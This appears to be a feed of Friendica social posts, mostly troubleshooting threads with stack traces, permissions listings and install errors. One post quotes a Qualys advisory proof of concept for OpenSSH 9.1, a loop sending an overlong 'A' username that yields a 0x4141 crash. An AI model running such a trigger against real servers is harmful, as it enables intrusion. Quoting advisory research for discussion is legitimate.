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April 15th, 2024, in the Top 10 Most Secure Mobile Phones to Buy in 2024, the cybersecurity-focused firm Efani, has ranked Purism Librem 5 as as the #1 most secure phone for the year 2024. From their article:

Read Article Here:


New error message (of FRIO) about a folder created by the user root.

I haven't found the extensive conversation about this problem with @Hypolite Petovan yet but I'm quite sure that I changed all folders to ownership of user www-data before 28th of November of the smarty folder. Actually there was another conversation about ownership of folders and I changed all folders to be owned by root except storage and view that day on 02:45hs, the new folder owned by root at /view/smarty3/compiled/ like stated below was created on 3:50hs.

As for what I remember of all the conversations this shouldn't have happened.

Service Unavailable
unable to create directory /var/www/html/view/smarty3/compiled/7c/ea/e6
Exception thrown in /var/www/html/src/Core/Renderer.php:90
Stack trace:
#0 /var/www/html/mod/photos.php(902): Friendica\Core\Renderer::replaceMacros()
#1 /var/www/html/src/LegacyModule.php(96): photos_content()
#2 /var/www/html/src/LegacyModule.php(73): Friendica\LegacyModule->runModuleFunction()
#3 /var/www/html/src/BaseModule.php(244): Friendica\LegacyModule->content()
#4 /var/www/html/src/App.php(703): Friendica\BaseModule->run()
#5 /var/www/html/index.php(52): Friendica\App->runFrontend()
#6 {main}

Console research resultrootname@VPShosting:/var/www/html/view/smarty3/compiled# ls -l
drwxr-xr-x 5 www-data www-data 4096 Dec 6 00:40 7b
drwxr-xr-x 3 root root 4096 Nov 28 03:50 7c
drwxr-xr-x 3 www-data www-data 4096 Nov 28 02:45 7d
rootname@VPShosting:/var/www/html/view/smarty3/compiled# cd 7c
rootname@VPShosting:/var/www/html/view/smarty3/compiled/7c# ls -l
total 4
drwxr-xr-x 3 root root 4096 Nov 28 03:50 d2
rootname@VPShosting:/var/www/html/view/smarty3/compiled/7c# cd d2
rootname@VPShosting:/var/www/html/view/smarty3/compiled/7c/d2# ls -l
total 4
drwxr-xr-x 2 root root 4096 Nov 28 03:50 69
rootname@VPShosting:/var/www/html/view/smarty3/compiled/7c/d2# cd 69
rootname@VPShosting:/var/www/html/view/smarty3/compiled/7c/d2/69# ls -l
total 4
-rw-r--r-- 1 root root 710 Nov 28 03:50 7cd2693513597460a71347ba02d3179c5e5ab822_2.string.php
nano 7cd2693513597460a71347ba02d3179c5e5ab822_2.string.php
/* Smarty version 4.3.1, created on 2023-11-28 03:50:02
  from '7cd2693513597460a71347ba02d3179c5e5ab822' */
/* @var Smarty_Internal_Template $_smarty_tpl */
if ($_smarty_tpl->_decodeProperties($_smarty_tpl, array (
  'version' => '4.3.1',
  'unifunc' => 'content_6565636a645732_50647552',
  'has_nocache_code' => false,
  'file_dependency' => 
  array (
  'includes' => 
  array (
),false)) {
function content_6565636a645732_50647552 (Smarty_Internal_Template $_smarty_tpl) {
?>[url=]utopiArte[/url] replied to you on [url=]"bugreport - can't answer, like or reshare posts"[/url]<?p>
#3 #1 #2 #4 #5 #6 @Hypolite Petovan

Service Unavailable
unable to create directory /var/www/html/view/smarty3/compiled/90/4f/52

Exception thrown in /var/www/html/src/Core/Renderer.php:90
Stack trace:
#0 /var/www/html/view/theme/frio/config.php(199): Friendica\Core\Renderer::replaceMacros()
#1 /var/www/html/view/theme/frio/config.php(141): frio_form()
#2 /var/www/html/src/Module/Admin/Themes/Embed.php(89): theme_admin()
#3 /var/www/html/src/BaseModule.php(244): Friendica\Module\Admin\Themes\Embed->content()
#4 /var/www/html/src/App.php(703): Friendica\BaseModule->run()
#5 /var/www/html/index.php(52): Friendica\App->runFrontend()
#6 {main}

#3 #1 #2 #4 #5 #6

@Hypolite Petovan
Ok fixed that

Executable: /home/anubis2814/mywebsite/bin/console.php
Arguments: array (
0 => 'autoinstall',
Options: array (
'v' => 1,
Command: autoinstall
Initializing setup...

Checking environment...
NOTICE: Not checking .htaccess/URL-Rewrite during CLI installation.

[Error] --------
GNU Multiple Precision PHP module: Error: GNU Multiple Precision PHP module required but not installed.

#0 /home/anubis2814/mywebsite/vendor/asika/simple-console/src/Console.php(108): Friendica\Console\AutomaticInstallation->doExecute()
#1 /home/anubis2814/mywebsite/src/Core/Console.php(163): Asika\SimpleConsole\Console->execute()
#2 /home/anubis2814/mywebsite/vendor/asika/simple-console/src/Console.php(108): Friendica\Core\Console->doExecute()
#3 /home/anubis2814/mywebsite/bin/console.php(41): Asika\SimpleConsole\Console->execute()
#4 {main}
Is this error an issue?

!Friendica Support
So I am stuck at the create a database point. I can't tell if they just told me, create a database without telling me how or if this helped create a database. I went with B and here were the resutls. Are there peices missing or are these warnings ok for the system we are using?

$ bin/console autoinstall -v
PHP Warning: Module "curl" is already loaded in Unknown on line 0
PHP Warning: Module "gd" is already loaded in Unknown on line 0
PHP Warning: Module "mbstring" is already loaded in Unknown on line 0
Executable: /home/anubis2814/mywebsite/bin/console.php
Arguments: array (
0 => 'autoinstall',
Options: array (
'v' => 1,
Command: autoinstall
Initializing setup...
PHP Warning: Module "curl" is already loaded in Unknown on line 0
PHP Warning: Module "gd" is already loaded in Unknown on line 0
PHP Warning: Module "mbstring" is already loaded in Unknown on line 0
PHP Warning: Module "curl" is already loaded in Unknown on line 0
PHP Warning: Module "gd" is already loaded in Unknown on line 0
PHP Warning: Module "mbstring" is already loaded in Unknown on line 0

Checking environment...
PHP Warning: Module "curl" is already loaded in Unknown on line 0
PHP Warning: Module "gd" is already loaded in Unknown on line 0
PHP Warning: Module "mbstring" is already loaded in Unknown on line 0
PHP Warning: Module "curl" is already loaded in Unknown on line 0
PHP Warning: Module "gd" is already loaded in Unknown on line 0
PHP Warning: Module "mbstring" is already loaded in Unknown on line 0
NOTICE: Not checking .htaccess/URL-Rewrite during CLI installation.

[Error] --------
GNU Multiple Precision PHP module: Error: GNU Multiple Precision PHP module required but not installed.

#0 /home/anubis2814/mywebsite/vendor/asika/simple-console/src/Console.php(108): Friendica\Console\AutomaticInstallation->doExecute()
#1 /home/anubis2814/mywebsite/src/Core/Console.php(163): Asika\SimpleConsole\Console->execute()
#2 /home/anubis2814/mywebsite/vendor/asika/simple-console/src/Console.php(108): Friendica\Core\Console->doExecute()
#3 /home/anubis2814/mywebsite/bin/console.php(41): Asika\SimpleConsole\Console->execute()
#4 {main}

The ENOSPC problem seems to have resolved itself, but now, new -dev version, and I get

PHP Fatal error: Uncaught Error: Class "Friendica\Core\Logger\Util\Introspection" not found in /var/www/html/static/dependencies.config.php:192
Stack trace:
#0 /var/www/html/index.php(32): include()
#1 {main}
thrown in /var/www/html/static/dependencies.config.php on line 192

This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage:

Here I was thinking this bug was hopeless and they one-line it without writing new code:

$ cp -i /usr/bin/ssh ./ssh

$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh

$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
"$user:$user" ;done


#1 0x4141414141414141 in ?? ()

@Friendica Support I want to delete a post which was accidentially saved to a folder. How to do it? Only thing I see is a pop-up saying that I will be deleting the post, but no button or anything else to be clicked. See screenshots: #1 Firefox on Android, #2 Firefox on Windows.


Can't add contacts after upgrade top 2022.10

!Friendica Support


My system runs on an Raspberry Pi3, Debian 11

Since the upgrade to Friendica 2022.10 adding new contacts in mastodon shows me an error-code.

Exception thrown in /var/www/html/src/ModuleContact/Profile.php:141
Stack trace:
#0 /var/www/html/src/BaseModule.php(244): Friendica\Module\Contact\Profile->con>
#1 /var/www/html/src/App.php(719): Friendica\BaseModule->run()
#2 /var/www/html/index.php(44): Friendica\App->runFrontend()
#3 {main}

I have Friendica debug logs for times around the contact-attempt, but there isn't even shown the contacts-profile-url (but those of many others, i'm not in contact with).

Afterwards, the contact is added as RSS.


Adding a new membership ends up with error messages on screen

Network type can't be detected, contact can't be added.
Profile-url doesn't give proper information, no compatible protocolls for communication oder feeds can be found.

Error messages on screen: Network type can't be detected, contact can't be added. Profile-url doesn't give proper information, no compatible protocolls for communication oder feeds can be found.

Here i also can't find anything related in the logs.

Does anyone has similar issues?
